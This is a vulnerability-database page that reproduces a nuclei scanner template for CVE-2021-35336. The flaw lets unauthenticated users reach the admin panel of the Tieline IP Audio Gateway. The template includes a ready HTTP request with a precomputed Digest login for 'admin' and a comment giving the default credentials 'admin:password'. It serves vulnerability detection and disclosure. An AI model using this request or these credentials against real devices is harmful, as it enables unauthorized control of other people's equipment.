Lucene search
K

Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

Tieline IP Audio Gateway <=2.6.4.8 Unauthorized Remote Admin Panel Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-35336
27 Apr 202309:58
circl
CNNVD
Tieline IP Audio Gateway 访问控制错误漏洞
1 Jul 202100:00
cnnvd
CVE
CVE-2021-35336
1 Jul 202112:33
cve
Cvelist
CVE-2021-35336
1 Jul 202112:33
cvelist
NVD
CVE-2021-35336
1 Jul 202113:15
nvd
OSV
CVE-2021-35336
1 Jul 202113:15
osv
Prion
Improper access control
1 Jul 202113:15
prion
RedhatCVE
CVE-2021-35336
22 May 202518:37
redhatcve
id: CVE-2021-35336

info:
  name: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access
  author: Pratik Khalane
  severity: critical
  description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.
  impact: |
    An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.
  remediation: |
    Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.
  reference:
    - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35336
    cwe-id: CWE-1188
    epss-score: 0.11587
    epss-percentile: 0.95513
    cpe: cpe:2.3:h:tieline:ip_audtio_gateway:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tieline
    product: ip_audtio_gateway
  tags: cve2021,cve,tieline,default-login,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/api/get_device_details'

    headers:
      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
      Referer: '{{BaseURL}}/assets/base/home.html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<SERIAL>"
          - "<VERSION>"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200

# admin:password
# digest: 490a004630440220713f3c025290024dbd9f3594489abeaeea6c1756c1d62572d05cac41a2fe8a7f022038c08ae47e112a038408af22df9cfd666ae443ae665faaf353e0ff5ec26b188e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.11587
35